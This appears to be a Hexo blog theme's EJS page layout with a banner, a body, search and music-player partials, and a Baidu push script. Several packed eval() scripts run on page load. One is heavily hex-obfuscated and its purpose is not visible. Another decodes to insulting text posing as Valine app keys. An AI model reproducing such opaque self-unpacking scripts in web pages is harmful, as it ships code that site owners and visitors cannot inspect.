<%
var subtitle = page.subtitle || page.title
var banner_img = page.banner_img || theme.index.banner_img
var banner_img_height = page.banner_img_height || theme.index.banner_img_height
var banner_mask_alpha = page.banner_mask_alpha || theme.index.banner_mask_alpha
var colorSchema = theme.dark_mode && theme.dark_mode.enable && theme.dark_mode.default ? theme.dark_mode.default : ''
%>

<!DOCTYPE html>
<html lang="<%= config.language %>" <%= colorSchema ? `data-default-color-scheme="${colorSchema}"` : '' %>>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3 4="5",0="1",2="6",a="b",c="7",8="9";',13,13,'MjOF5|U1kWVhiTU1J|wlNgSyoP6|var|ZU4|DQ3dmbG5L|bnR2NUlT|hiTU1J|hPjHsvGO5|ODJMb2lBZHczYjNBd2Nl|j3|RIczBTZ0NMN2FZeWlNZmZSLU1kWV|mXLcNMYJJ4'.split('|'),0,{}))
</script>
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('I["\\8\\V\\k\\s"](N(K,S,b,F,v,X){v=N(b){O(b<S?"":v(I["\\x\\k\\j\\R\\8\\Z\\g\\o"](b/S)))+((b=b%S)>1k?I["\\E\\o\\j\\i\\g\\r"]["\\u\\j\\w\\L\\U\\z\\k\\j\\U\\w\\m\\8"](b+1l):b["\\o\\w\\E\\o\\j\\i\\g\\r"](1m))};13(!\'\'["\\j\\8\\x\\s\\k\\n\\8"](/^/,I["\\E\\o\\j\\i\\g\\r"])){11(b--)X[v(b)]=F[b]||v(b);F=[N(v){O X[v]}];v=N(){O\'\\\\\\D\\H\'};b=1};11(b--)13(F[b])K=K["\\j\\8\\x\\s\\k\\n\\8"](1j I["\\15\\8\\r\\16\\3\\x"](\'\\\\\\q\'+v(b)+\'\\\\\\q\',\'\\r\'),F[b]);O K}(\'\\8\\d\\7\\\\\\f\\\\\\15\\\\\\m\\\\\\k\\7\\c\\6\\z\\6\\J\\h\\G\\h\\4\\h\\n\\h\\e\\h\\x\\W\\a\\5\\C\\e\\y\\z\\6\\4\\5\\C\\s\\6\\4\\1x\\G\\17\\7\\7\\12\\e\\6\\8\\d\\7\\\\\\u\\\\\\m\\\\\\9\\\\\\w\\\\\\f\\\\\\1a\\\\\\r\\\\\\q\\7\\c\\6\\4\\T\\G\\5\\5\\5\\H\\6\\6\\4\\y\\4\\1z\\G\\5\\1y\\1q\\17\\8\\d\\7\\\\\\L\\\\\\q\\\\\\9\\\\\\i\\\\\\r\\\\\\p\\7\\c\\d\\7\\\\\\1o\\\\\\9\\\\\\t\\\\\\1t\\\\\\o\\\\\\16\\\\\\m\\\\\\9\\\\\\o\\\\\\t\\\\\\14\\\\\\f\\7\\c\\6\\4\\H\\U\\5\\12\\4\\d\\7\\\\\\q\\\\\\t\\\\\\L\\\\\\q\\\\\\9\\\\\\i\\\\\\r\\\\\\p\\7\\c\\6\\1s\\5\\5\\B\\A\\V\\6\\1r\\\'\\\'\\d\\7\\\\\\9\\\\\\f\\\\\\u\\\\\\k\\\\\\m\\\\\\g\\\\\\f\\7\\c\\6\\T\\1v\\T\\h\\8\\d\\7\\\\\\L\\\\\\q\\\\\\9\\\\\\i\\\\\\r\\\\\\p\\7\\c\\5\\5\\C\\R\\6\\4\\M\\M\\5\\x\\W\\a\\d\\e\\6\\4\\5\\c\\y\\n\\d\\4\\c\\2\\2\\e\\6\\4\\5\\A\\n\\y\\d\\z\\6\\e\\5\\C\\s \\x\\W\\a\\d\\e\\c\\B\\c\\A\\e\\y\\z\\6\\5\\C\\s\\\'\\\\\\\\\\\\\\3\\\\\\D\\\'\\B\\A\\4\\y\\P\\B\\A\\R\\6\\4\\M\\M\\5\\V\\6\\n\\d\\4\\c\\5\\J\\y\\J\\d\\7\\\\\\9\\\\\\f\\\\\\u\\\\\\k\\\\\\m\\\\\\g\\\\\\f\\7\\c\\6\\1p \\8\\d\\7\\\\\\19\\\\\\f\\\\\\p\\\\\\1u\\\\\\E\\\\\\u\\7\\c\\6\\\'\\\\\\\\\\\\\\j\\\'\\H\\e\\6\\4\\5\\H\\\'\\\\\\\\\\\\\\j\\\'\\h\\\'\\\\\\p\\\'\\5\\h\\n\\d\\4\\c\\5\\A\\s \\J\\B\\6\\\'\\\\\\Z\\\\\\1i\\\\\\1f\\\\\\Q\\\\\\1g\\\\\\1h\\\\\\Q\\\\\\1d\\\\\\10\\\\\\1c\\\'\\h\\l\\h\\l\\h\\\'\\\\\\g\\\\\\t\\\\\\r\\\\\\w\\\\\\t\\\\\\k\\\\\\f\\\\\\18\\\\\\k\\\\\\t\\\\\\p\\\'\\d\\7\\\\\\w\\\\\\u\\\\\\k\\\\\\i\\\\\\q\\7\\c\\6\\\'\\\\\\18\\\'\\5\\h\\Y\\h\\C\\B\\5\\5\',1b,1b,\'\\2\\2\\2\\J\\1n\\1e\\Z\\1a\\z\\g\\8\\E\\4\\2\\3\\a\\e\\2\\1d\\19\\1c\\e\\2\\2\\3\\9\\l\\2\\3\\a\\u\\2\\3\\a\\9\\2\\3\\a\\n\\2\\3\\9\\f\\2\\G\\f\\2\\3\\a\\P\\2\\D\\i\\g\\m\\w\\D\\2\\3\\9\\Y\\2\\3\\a\\8\\2\\u\\Q\\g\\n\\o\\i\\w\\g\\2\\3\\a\\p\\2\\E\\P\\2\\1e\\l\\2\\j\\8\\o\\Q\\j\\g\\2\\3\\e\\4\\2\\3\\a\\4\\2\\3\\9\\4\\2\\1w\\10\\8\\14\\2\\3\\9\\n\\2\\3\\a\\l\\2\\D\\z\\i\\s\\8\\2\\3\\f\\4\\2\\3\\4\\m\\2\\i\\u\\2\\3\\l\\q\\2\\3\\9\\9\\2\\3\\a\\a\\2\\3\\a\\m\\2\\3\\f\\p\\2\\4\\e\\2\\l\\p\\2\\4\\a\\2\\3\\a\\t\\2\\3\\a\\f\\2\\3\\l\\t\\2\\3\\4\\P\\2\\3\\4\\Y\\2\\3\\l\\p\\2\\3\\9\\m\\2\\3\\9\\q\\2\\3\\4\\8\\2\\3\\e\\l\\2\\g\\8\\D\\2\\3\\l\\8\\2\\3\\f\\e\\2\\3\\9\\a\\2\\3\\9\\t\'["\\R\\x\\s\\i\\o"](\'\\2\'),0,{}))',62,98,'||x7c|x78|x33|x29|x28|x22|x65|x37|x36|OgF3|x5d|x5b|x35|x34|x6e|x2c|x69|x72|x61|x32|x64|x63|x74|x39|x62|x67|x6c|x38|x66|hUGsXn_5|x6f|x70|x3d|x68|x3b|x7d|x7b|x77|x53|sGk4|x6b|x2b|window|x6a|HamdnCaMF1|x6d|x2d|function|return|x31|x75|x73|OrHvV2|x2f|x43|x76|x24|u6|x30|x49|x4c|while|x3a|if|x46|x52|x45|x3f|x71|x4e|x41|55|x4b|x4d|x5f|x48|x47|x4a|x50|new|35|29|36|x56|x79|x4f|x42|x21|x44|x7a|x51|x5e|x58|x3c|x3e|x25'.split('|'),0,{}))
</script>
<%- partial('_partial/head') %>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3 4="2",0="1",5="9",a="8",6="7";',11,11,'Yn2|UDc2eGxnRVV5|MDkxUFRKVn|var|rfwFoV1|TWOUMh1|rU3|wdGp5Z3pxQXZjL|NU9tcjdkYk9PWXl|Uk1YNld0eXp3VWMyaVI|jUYjTJZ2'.split('|'),0,{}))
</script>
<style>
span.heimu a.external,span.heimu a.external:visited,span.heimu a.extiw,span.heimu a.extiw:visited {
    color: #252525
}
.heimu,.heimu a,a .heimu,.heimu a.new {
    background-color: #252525;
    color: #252525;
    text-shadow: none
}
body:not(.heimu_toggle_on) .heimu:hover,body:not(.heimu_toggle_on) .heimu:active,body:not(.heimu_toggle_on) .heimu.off {
    transition: color .13s linear;
    color: #fff
}
body:not(.heimu_toggle_on) .heimu:hover a,body:not(.heimu_toggle_on) a:hover .heimu,body:not(.heimu_toggle_on) .heimu.off a,body:not(.heimu_toggle_on) a:hover .heimu.off {
    transition: color .13s linear;
    color: #add8e6
}
body:not(.heimu_toggle_on) .heimu.off .new,body:not(.heimu_toggle_on) .heimu.off .new:hover,body:not(.heimu_toggle_on) .new:hover .heimu.off,body:not(.heimu_toggle_on) .heimu.off .new,body:not(.heimu_toggle_on) .heimu.off .new:hover,body:not(.heimu_toggle_on) .new:hover .heimu.off {
    transition: color .13s linear;
    color: #ba0000
}
</style>
<body>
  <header style="height: <%- banner_img_height %>vh;">
    <%- partial('_partial/nav') %>
    <div class="banner intro-2" id="background" <%- theme.banner_parallax && 'parallax=true' %>
         style="background: url('<%- url_for(banner_img) %>') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, <%= parseFloat(banner_mask_alpha) %>)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              <% if(theme.fun_features.typing.enable == false) { %>
                <%- subtitle %>
              <% } %>
            </span>

            <% if(is_post()) { %>
              <%- partial('_partial/post-meta') %>
            <% } %>
          </div>

          <% if (theme.scroll_down_arrow.enable && theme.scroll_down_arrow.banner_height_limit <= banner_img_height) { %>
            <div class="scroll-down-bar">
              <i class="iconfont icon-arrowdown"></i>
            </div>
          <% } %>
        </div>
      </div>
    </div>
  </header>

  <main>
    <% if(is_post() || page.layout == '404') { %>
      <%- body %>
    <% } else { %>
      <div class="container nopadding-md">
        <div class="py-5" id="board"
          <%- banner_img_height >= 100 && theme.banner_parallax ? 'style=margin-top:0' : '' %>>
          <% if(page.layout == 'about') { %>
            <div class="about-avatar">
              <img src="<%- url_for(theme.about.avatar) %>"
                   class="img-fluid" alt="avatar">
            </div>
          <% } %>
          <div class="container">
            <div class="row">
              <div class="col-12 col-md-10 m-auto">
                <%- body %>
              </div>
            </div>
          </div>
        </div>
      </div>
    <% } %>
  </main>

  <% if (theme.scroll_top_arrow.enable) { %>
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  <% } %>

  <% if (theme.search.enable) { %>
    <%- partial('_partial/search') %>
  <% } %>

  <% if (theme.aplayer && theme.aplayer.enable && theme.aplayer.songs) { %>
    <!-- APlayer 音乐播放器 -->
    <div id="aplayer"></div>
    <%- partial('_partial/plugins/aplayer.ejs') %>
  <% } %>

  <% if (theme.custom_html) { %>
    <div class="col-lg-7 mx-auto nopadding-md">
      <div class="container custom mx-auto">
        <%- theme.custom_html %>
      </div>
    </div>
  <% } %>

  <%- partial('_partial/footer', { data: { 'subtitle': subtitle } }) %>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script><!--Valine appid&appkey--><script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('0 4="\\1\\5\\2\\6\\3\\7";0 a="\\1\\2\\b\\8\\9";',12,12,'var|u4f60|u5988|u627e|app_id|u4ed6|u518d|uff1f|u4e86|uff01|app_key|u6b7b'.split('|'),0,{}))
</script></body>
</html>
